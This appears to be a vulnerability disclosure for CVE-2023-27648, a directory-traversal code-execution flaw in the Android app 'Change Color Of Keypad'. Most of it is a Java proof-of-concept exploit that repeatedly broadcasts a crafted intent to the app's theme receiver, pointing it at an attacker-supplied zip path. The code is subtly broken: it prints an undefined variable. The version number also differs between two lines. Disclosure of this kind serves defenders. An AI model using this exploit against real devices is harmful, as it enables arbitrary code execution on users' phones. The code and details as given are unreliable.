Code execution exists in Change Color Of Keypad(CVE-2023-27648)
Vendor:T-ME Studios (https://corporate.timmystudios.com/)
Affected product:Change Color Of Keypad (com.jb.gokeyboard.theme.twchangecolorofkeypad)
Version:11.275.1.277
Download link:https://play.google.com/store/apps/details?id=com.jb.gokeyboard.theme.twchangecolorofkeypad
Description of the vulnerability for use in the CVE:Directory Traversal vulnerability found in T-ME Studios Change Color of Keypad v.1.275.1.277 allows a remote attacker to execute arbitrary code via the dex file in the internal storage.
poc:
private void attack() {
while (true) {
Intent intent = new Intent();
ComponentName componentName = new ComponentName("com.jb.gokeyboard.theme.twchangecolorofkeypad", "com.timmystudios.redrawkeyboard.themes.SuperThemeReceiver");
intent.setComponent(componentName);
intent.setAction("com.timmystudios.redrawkeyboard.intent.action.THEME_APPLIED");
intent.putExtra("package-name","com.ludashi.xsuperclean");
intent.putExtra("selected-font",true);
intent.putExtra("font_name","hack");
intent.putExtra("font_id","2");
intent.putExtra("font_resource","hackkkk");
intent.putExtra("font_size",123456);
intent.putExtra("selected-sound",true);
intent.putExtra("sound_name","hack");
intent.putExtra("sound_id","2");
intent.putExtra("sound_resource","hackkkk");
intent.putExtra("sound_size",123456);
intent.putExtra("go_theme_id",3);
intent.putExtra("go_res_zip_path","/data/local/tmp/test.zip");
System.out.println("发送的数据大小:" + legnth);
try {
System.out.println("发送数据");
sendBroadcast(intent);
} catch (Exception e) {
}
}
}